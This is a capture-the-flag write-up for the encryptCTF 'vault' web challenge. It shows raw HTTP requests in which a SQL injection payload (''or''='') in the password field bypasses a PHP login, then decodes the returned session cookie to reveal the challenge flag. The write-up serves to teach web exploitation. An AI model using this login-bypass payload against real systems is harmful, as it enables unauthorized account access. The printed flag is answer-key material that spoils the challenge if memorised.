Tags: sqli web
Rating:
# ▼▼▼vault(Web:100、193/696=27.8%)▼▼▼
This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)
```
i heard you are good at breaking codes, can you crack this vault?
http://104.154.106.182:9090
author: codacker
```
---
`http://104.154.106.182:9090`
↓ Access URL
## 【Try 1: admin/admin】
login as `username=admin&password=admin`
↓
```
POST /login.php HTTP/1.1
Host: 104.154.106.182:9090
Content-Type: application/x-www-form-urlencoded
username=admin&password=admin&submit=submit
```
↓
```
HTTP/1.1 200 OK
Date: Thu, 04 Apr 2019 13:05:27 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.3.3
Vary: Accept-Encoding
Content-Length: 427
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" type="text/css" media="screen" href="css/main.css">
</head>
<body>
<div class="main">
<h1 class="heading">
ACCESS DENIED </h1>
</div>
</body>
</html>
```
↓
Login failed...
---
## 【Try 2: SQL Injection】
```
POST /login.php HTTP/1.1
Host: 104.154.106.182:9090
Content-Type: application/x-www-form-urlencoded
username=admin&password='or''='&submit=submit
```
↓
```
HTTP/1.1 200 OK
Date: Thu, 04 Apr 2019 13:08:49 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.3.3
Set-Cookie: SESSIONID=ZW5jcnlwdENURntpX0g0dDNfaW5KM2M3aTBuNX0%3D
Vary: Accept-Encoding
Content-Length: 465
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" type="text/css" media="screen" href="css/main.css">
</head>
<body>
<div class="main">
<h1 class="heading">
ACCESS GRANTED
</h1>
</div>
</body>
</html>
```
↓
Login success!! and Get `Set-Cookie: SESSIONID=ZW5jcnlwdENURntpX0g0dDNfaW5KM2M3aTBuNX0%3D`
↓
`ZW5jcnlwdENURntpX0g0dDNfaW5KM2M3aTBuNX0%3D`
↓ url decode
`ZW5jcnlwdENURntpX0g0dDNfaW5KM2M3aTBuNX0=`
↓ decode by base64
`encryptCTF{i_H4t3_inJ3c7i0n5}`
